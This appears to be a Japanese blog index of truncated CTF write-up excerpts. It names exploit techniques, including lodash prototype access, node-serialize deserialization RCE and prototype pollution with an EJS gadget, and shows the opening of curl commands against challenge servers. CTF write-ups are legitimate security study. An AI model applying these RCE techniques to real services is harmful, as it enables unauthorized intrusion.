問題リポジトリ: tsg-ut/tsg-live-ctf-6 [Web] Truth about Pi [Rev] decompile me [Web] Truth about Pi lodash.get の 4.4.2 では __proto__ にもアクセスできる。''.__proto__.length は 0。 curl 'http://chal.hakatashi.com:10043/' -H 'Content-Type: …

6/4 - 6/6という日程で開催された。zer0ptsで参加して1位 [Web] sparta [Web] bxxs [Web] Flags [Web] Original Store [Web] Original Store v2 [Web] sparta node-serialize というライブラリの脆弱性を使うとRCEできる。 $ curl -X POST -i http://web.zh3…

5/29 - 5/31という日程で開催された。uuunderflowで参加して2位。 [Web] Illusion [Web] HackUs [Web] Small Talk [Pwn] C'mon See my Vulns [Web] Illusion サーバサイドのPrototype Pollution + EJSのgadgetでRCE。 $ curl --basic -u admin:isummlngdhhvw…

6/11 - 6/14という日程で開催された。zer0ptsで参加して3位。 問題リポジトリ: BCACTF/bcactf-2.0 [webex 200] Regular Website (87 solves) [webex 300] L10N Poll (46 solves) [webex 400] Stylish (28 solves) [webex 450] Completely Secure Publishing …